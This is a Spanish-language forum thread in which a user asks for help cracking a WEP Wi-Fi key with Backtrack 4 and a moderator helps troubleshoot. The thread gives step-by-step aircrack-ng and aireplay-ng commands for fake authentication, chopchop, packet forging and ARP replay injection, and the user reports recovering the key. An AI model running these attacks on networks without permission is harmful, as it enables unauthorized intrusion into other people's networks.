Resultados 1 al 11 de 11

Tema: Duda Backtrack 4 WEP

  1. #1 Duda Backtrack 4 WEP 
    Iniciado
    Fecha de ingreso
    Jun 2010
    Mensajes
    24
    Descargas
    7
    Uploads
    0
    Hola a todos.
    Mi duda es que si se necesita que alguien este generando trafico en la red para poder averiguar la clave WEP con backtrack 4. En algunos post que mire ponia que para WPA si que hace falta que alguien este conectado para desconectarle y que se vuelva a conectar para asi poder conseguir el Hanshake ese o como se llame xD pero para cifrado WEP mire que no hacia falta...
    El problema que tuve fue que no subian los ARP pero cuando conectaba mi movil al router...subian los ARP y despues se paraban otra vez. Solo subian cuando me conectaba por eso digo de que si hay que generar trafico en la red..

    Si alguien tiene un buen tutorial del Backtrack 4...porfavor que me lo diga.

    Muchas gracias
    Un saludo
    Citar  
     

  2. #2  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    Tu duda no es específica de Backtrack, sino de las comunicaciones inalámbricas protegidas con WEP en general y creo que más especificamente de aircrack-ng.

    Antes solía escribir respuestas elaboradas a este tipo de dudas, pero la comunidad de aircrack-ng ha crecido asombrosamente y el nivel es muy bueno. La respuesta a tu pregunta está aquí:

    http://www.aircrack-ng.org/doku.php?...ith_no_clients


    Salu2

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  3. #3  
    Iniciado
    Fecha de ingreso
    Jun 2010
    Mensajes
    24
    Descargas
    7
    Uploads
    0
    Muchas gracias j8
    Citar  
     

  4. #4  
    Iniciado
    Fecha de ingreso
    Jun 2010
    Mensajes
    24
    Descargas
    7
    Uploads
    0
    Hola de nuevo
    El problema que tengo es que los ARP no suben...
    En la foto sale que tiene 24 por que me conecte con el movil al router para generar trafico.
    El router lo tengo en la habitacion del al lado.
    Nose si es que el ataque 1+3 es muy lento o nose lo que puede pasar.

    Muchas gracias a quien me pueda ayudar

    Un saludo
    Citar  
     

  5. #5  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    El ataque 1+3 es muy rápido

    En esa captura no se ven 24 paquetes, sino 7089. Utiliza aircrack sobre todos los archivos de captura (tanto los del aireplay-ng como el/los de airmon-ng) para confirmarlo.

    Puedes usar aireplay-ng para reinyectar los mismos que has capturado.


    Salu2

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  6. #6  
    Iniciado
    Fecha de ingreso
    Jun 2010
    Mensajes
    24
    Descargas
    7
    Uploads
    0
    Hola j8

    ¿Me podrias decir que tengo que poner en aireplay-ng para reinyectar los paquetes capturados?

    Tambien tengo otra duda...
    Me asocio de esta forma:
    aireplay-ng -1 10 -a <Mac AP> -h <Mi Mac> mon0
    Todo bien por que me sale la carita :-)

    Lo siguiente que hago es:
    aireplay-ng -4 -b <Mac AP> -h <Mi Mac> mon0
    Todo bien por que me detecta un paquete y al final crea el archivo .cap y .xor

    Lo siguiente que hago es:
    tcpdump-ng -s 0 -n -e -r <.cap> mon0
    Todo bien

    Lo siguiente:
    packetforge-ng -0 -a <Mac AP> -h <Mi Mac> -k<ip> -l <ip> -y <.xor> -w <archivo>
    Todo bien

    Lo siguiente es la duda..
    Escribo:
    aireplay-ng -2 -h <Mi Mac> -r <archivo> mon0
    la duda es que cuando empieza a subir los paquetes, se desasocia y deja se subir el numero de paquetes.
    ¿sabrias tu por que pasa eso?
    ¿es algo raro no?

    Muchas gracias
    Un saludo
    Citar  
     

  7. #7  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    La desasociación ocurre porque el route te echa. A veces basta con volver a asociarte con la misma dirección MAC.

    Para reinyectar los ARP capturados puedes usar algo como:

    Código:
    aireplay-ng -3 -D -a <la_mac_del_AP> -e <su_essid> -h <la_mac_asociada_con_el_ataque_-1> -r <captura_con_los_arp> <interfaz_con_capacidad_de_inyectar>

    Salu2

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  8. #8  
    Iniciado
    Fecha de ingreso
    Jun 2010
    Mensajes
    24
    Descargas
    7
    Uploads
    0
    Muchas gracias j8
    Lo probare lo antes que pueda y ya te contare.
    Citar  
     

  9. #9  
    Iniciado
    Fecha de ingreso
    Jun 2010
    Mensajes
    24
    Descargas
    7
    Uploads
    0
    Hola j8

    Aunque me asocie otra vez...me sigue hechando. Lo que e hecho a sido poner 100 en vez de 10, con lo cual a quedado asi aireplay-ng -1 100 -a <Mac AP> -h <Mi Mac> <interfaz de red> y tardaba mas tiempo en volver a asociarse entonces me daba tiempo a que subieran los Data para lanzar aircrack-ng. Al final e sacado la clave WEP

    Tambien he probado a reinyectar y no me sale.Te cuento como lo e hecho por si e puesto algo mal.

    aireplay-ng -1 10 -a <Mac AP> -h <Mi Mac> <interfaz de red>
    Aqui todo bien por que me sale la cara :-) y se asocia.

    Despues escribo:
    aireplay-ng -3 -d -a <Mac AP> -h <Mi Mac> -r<captura con los ARP> <interfaz de red>
    Pues cuando se asocia de nuevo al haber pasado los 10 segundos..sube 2 ACKs y 1 data sube cada 2 o 3 segundos pero los ARP no sube de 0.

    En -r <captura con los ARP>...¿Es un archivo que se va a crear o que ya esta creado?

    Muchas gracias por seguir ayudandome
    Un saludo
    Citar  
     

  10. #10  
    Moderador Global
    Fecha de ingreso
    Aug 2005
    Mensajes
    6.279
    Descargas
    7
    Uploads
    0
    Es para reinyectar los ARPs contenidos en el archivo que le pasas con -r

    Salu2

    . . . . . . . . . . . . . . . . . . . .
    [[ NORMAS DEL FORO ]]
    . . . . . . . . . . . . . . . . . . . .
    __________
    Citar  
     

  11. #11  
    Iniciado
    Fecha de ingreso
    Jun 2010
    Mensajes
    24
    Descargas
    7
    Uploads
    0
    Hola j8

    Muchas gracias por seguir contestandome

    ¿Me podrias decir cuales son los pasos para reinyectar?
    Lo que yo pongo es:

    aireplay-ng -1 10 -a <Mac AP> -h <Mi Mac> mon0

    aireplay-ng -4 -b <Mac AP> -h <Mi Mac> mon0

    Lo que no se es cuando tengo que escribir aireplay-ng -3 -D -a <Mac AP> -e <ESSID> -h <Mi Mac> -r <Captura de ARP> mon0

    La duda es si lo tengo que escribir antes de aireplay-ng -4 -b...... o despues.


    Muchas gracias
    Un saludo
    Citar  
     

Temas similares

  1. backtrack 5
    Por 54yk3r en el foro INTRUSION
    Respuestas: 2
    Último mensaje: 03-04-2013, 02:38
  2. Duda Backtrack sobre asociacion de mac's
    Por half en el foro INTRUSION
    Respuestas: 4
    Último mensaje: 22-06-2010, 15:13
  3. BackTrack Portable
    Por LUK en el foro GENERAL
    Respuestas: 2
    Último mensaje: 23-07-2009, 15:48
  4. BackTrack v3.0 Final
    Por LUK en el foro NOTICIAS
    Respuestas: 0
    Último mensaje: 23-06-2008, 10:32
  5. BackTrack
    Por djinn941 en el foro LINUX - MAC - OTROS
    Respuestas: 2
    Último mensaje: 10-09-2006, 22:14

Marcadores

Marcadores

Permisos de publicación

  • No puedes crear nuevos temas
  • No puedes responder temas
  • No puedes subir archivos adjuntos
  • No puedes editar tus mensajes
  •